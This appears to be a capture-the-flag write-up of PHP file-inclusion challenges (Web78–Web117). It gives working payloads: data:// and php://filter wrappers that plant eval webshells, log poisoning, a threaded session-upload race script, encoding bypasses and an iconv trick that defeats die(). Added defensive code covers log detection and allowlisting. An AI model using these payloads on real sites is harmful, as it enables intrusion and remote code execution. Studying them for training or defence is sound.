Web78

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

Use the data wrapper or the php://filter wrapper.

?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=data:,<?php @eval($_POST['shell']); ?>
?file=data:text/plain,<?php @eval($_POST['shell']); ?>
?file=data:text/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4=
?file=data:text/php;base64,<?php @fputs(fopen(base64_decode('ZWFzdGp1bi5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4='));?>

Web79

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

"php" is filtered, so use the data wrapper with base64 encoding.

file=data:text/txt;base64,PD9waHAgZWNobyhgY2F0IGZsYWcucGhwYCk7Pz4=

Web80

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

Log file inclusion or remote file inclusion.

User-Agent:<?php @eval($_POST['shell']); ?>

file=/var/log/nginx/access.log

POST:shell=echo`cat *`;

Web81

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

Same approach as Web80, but the colon is filtered too, so remote file inclusion cannot be used.
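The Web78 to Web81 requests leave distinctive traces in the web server's access log: a stream wrapper in the file parameter, an absolute path to a log file, and (for log poisoning) a PHP open tag in the User-Agent. The following detector is an added example, not code from the original writeup; it runs over constructed nginx combined-format log lines embedded in the block (the IPs, timestamps and requests are made up) and flags each of those patterns, decoding the file parameter an extra two rounds so %25-style double encoding does not slip past.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx access-log lines (combined format) for this demonstration;
# IPs, timestamps and requests are made up, not captured from a real server.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?file=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /?file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 90 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?file=data:text/plain;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4= HTTP/1.1" 200 0 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php @eval($_POST['shell']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?file=/var/log/nginx/access.log HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
'''

# nginx "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)   # php:, data:, http:, expect: ...
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.I)           # PHP open tag landing in the log


def classify_request(request, ua):
    """Return the reasons (possibly none) that one log entry looks like an LFI attempt."""
    reasons = []
    if PHP_TAG_RE.search(ua):
        reasons.append("php tag in user-agent (log poisoning)")
    parts = request.split(" ")            # "GET /?file=... HTTP/1.1"
    if len(parts) >= 2:
        query = urlsplit(parts[1]).query
        for raw in parse_qs(query, keep_blank_values=True).get("file", []):
            # parse_qs decoded once already; two more rounds expose %2570 -> %70 -> p
            value = unquote(unquote(raw))
            if SCHEME_RE.match(value):
                reasons.append("stream wrapper in file param: " + value.split(":", 1)[0].lower())
            elif value.startswith("/") or ".." in value:
                reasons.append("absolute path or traversal in file param")
    return reasons


def scan_log(text):
    """Parse each log line and collect (ip, reasons) for the suspicious ones."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not combined format; skip rather than guess
        reasons = classify_request(m["request"], m["ua"])
        if reasons:
            findings.append((m["ip"], reasons))
    return findings


if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```

The User-Agent check is the one that matters for Web80: by the time the poisoned log is included, the request that planted the tag is already recorded, so the log itself is the evidence. Running the script prints one finding per suspicious line; the benign index.php request produces none.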

Web82-86

The underlying principle is explained here.

Solution 1:

Upload with PHP_SESSION_UPLOAD_PROGRESS set, then include /tmp/sess_eastjun through the file parameter; if the include happens before the session file is cleared, eastjun.php gets written.

<!DOCTYPE html>
<html>
<body>
<form action="http://5534e84b-01ac-43de-8e46-6e8be029fce6.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>

Then use a null payload with unlimited requests and 100 threads to generate eastjun.php; the password is shell.

Solution 2:

import requests
import threading

sessid = 'eastjun'
session = requests.session()
url = 'http://ed47a5fb-33ed-46de-8a78-63f887c6d835.challenge.ctf.show:8080/'


def write():
    while True:
        session.post(
            url = f"{url}?file=/tmp/sess_eastjun",
            params={"file": f"/tmp/sess_{sessid}"},
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php @fputs(fopen('eastjun.php',w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4='));?>"},
            files={"file": ('xxx.txt', open("shell.txt", "r"))}, cookies={'PHPSESSID': sessid})


for i in range(100):
    thread = threading.Thread(target=write)
    thread.start()
# create an empty shell.txt, then run the script; it writes the webshell in one go

Web87

<?php
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

The file name is URL-decoded before file_put_contents writes it. Replacing p with %2570 (%2570 → %70 → p) bypasses the php filter, base64 decoding breaks up the phpdie prefix, and two a's are prepended because phpdie is only 6 characters.

?file=%2570hp%253A%2F%2Ffilter%2Fwrite%3Dconvert%252Ebase64-decode%2Fresource%3Deastjun%252E%2570hp

POST:content=aaPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4=

Web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

Plus, equals and php are filtered, but semicolon, colon, comma, backslash and data are not, so the data wrapper with base64 works directly. If the payload contains = or +, add a few spaces inside it.

payload:file=data:text/plain;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4g
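Every challenge from Web79 to Web88 blocks strings (php, data, the colon, the dot) and every one is bypassed by a wrapper, a log path or an encoding the blocklist did not anticipate. The defensive counterpart is to decode, canonicalize and then compare against an allowlist rather than a denylist. The resolver below is an added example, not part of the writeup; DOC_ROOT and ALLOWED_PAGES are constructed values standing in for a real application's include directory.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed document root and page allowlist for the demonstration.
DOC_ROOT = "/var/www/html"
ALLOWED_PAGES = {"index.php", "about.php", "contact.php"}
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.\-]*:")   # any "scheme:" prefix


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing, so %2570 -> %70 -> p."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_include(requested):
    """Map a user-supplied name to a file under DOC_ROOT, or None to refuse it."""
    name = fully_decode(requested)
    if "\x00" in name or SCHEME_RE.match(name):
        return None                      # null byte or stream wrapper (php:, data:, http:, ...)
    candidate = posixpath.normpath(posixpath.join(DOC_ROOT, name))
    if posixpath.dirname(candidate) != DOC_ROOT:
        return None                      # absolute path or ../ traversal left the root
    if posixpath.basename(candidate) not in ALLOWED_PAGES:
        return None                      # not a page this application means to include
    return candidate


if __name__ == "__main__":
    for probe in ("index.php",
                  "php://filter/read=convert.base64-encode/resource=flag.php",
                  "data:text/plain,<?php echo 1; ?>",
                  "/var/log/nginx/access.log",
                  "%2570hp%253A%2F%2Ffilter%2Fresource%3Dflag%252E%2570hp",
                  "../../etc/passwd"):
        print(repr(probe), "->", resolve_include(probe))
```

Note that `flag.php` is refused even though it lives under the document root: the allowlist, not the blocklist, decides what may be included, and the scheme check runs after decoding so the Web87 double-encoding trick is seen as the `php://filter` path it really is.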

Web116

Fetching it with Python gives the source:

<?php
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=isset($_GET['file'])?$_GET['file']:"5.mp4";
filter($file);
header('Content-Type: video/mp4');
header("Content-Length: $file");
readfile($file);
?>

It uses readfile rather than include, so passing the file name directly reads the file.

import requests

response = requests.get("http://07b2db24-0246-4139-ba97-da3f8e38bfb0.challenge.ctf.show:8080/?file=flag.php")
print(response.text)

Web117

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

See the filter usage here, along with the various Unicode encodings. A conversion filter breaks up die(): converting UCS-2LE (little-endian) to UCS-2BE (big-endian) swaps every pair of adjacent characters.

payload: file=php://filter/convert.iconv.UCS-2LE.UCS2BE/resource=eastjun.php

POST:contents=?<hp pe@av(l_$OPTS'[hsle'l)]?; >
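To see exactly why the `<?php die();?>` prefix in Web117 is not a security control, the block below models the UCS-2LE to UCS-2BE conversion as a pairwise byte swap over the whole written buffer. This is an added example, not code from the writeup; the guard constant and the benign pre-swapped `echo` snippet are constructed, and the odd-trailing-byte handling is a simplification of the real filter.

```python
# Constructed stand-in for the prefix Web117 prepends to every write.
GUARD = b"<?php die();?>"


def iconv_ucs2le_to_ucs2be(data: bytes) -> bytes:
    """Model of PHP's convert.iconv.UCS-2LE.UCS-2BE filter on arbitrary bytes.

    Bytes are read as little-endian 16-bit units and written big-endian, so
    every adjacent byte pair swaps. A trailing odd byte is passed through
    unchanged here (a simplification; the real filter does not convert it).
    """
    even = len(data) - len(data) % 2
    out = bytearray()
    for i in range(0, even, 2):
        out += bytes((data[i + 1], data[i]))
    return bytes(out) + data[even:]


def filtered_write(contents: bytes) -> bytes:
    """What lands on disk when GUARD + contents pass through the swap filter."""
    return iconv_ucs2le_to_ucs2be(GUARD + contents)


def guard_intact(written: bytes) -> bool:
    """True only if the die() prefix survived and would still stop execution."""
    return written.startswith(GUARD)


if __name__ == "__main__":
    # Pre-swapped form of "<?php echo 'hi';?>" (constructed, harmless).
    benign = b"?<hp pceoh' ih;'>?"
    print(filtered_write(benign))
    print("guard intact without filter:", guard_intact(GUARD + benign))
    print("guard intact with filter:   ", guard_intact(filtered_write(benign)))
```

Because the guard is 14 bytes, an even length, the swap mangles it into `?<hp pid(e;)>?` while the attacker-chosen remainder, supplied pre-swapped, comes out as valid PHP. The only robust fix is the one from the include challenges: refuse any `scheme:` prefix in the file name and allowlist the destination, rather than relying on a prepended die().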
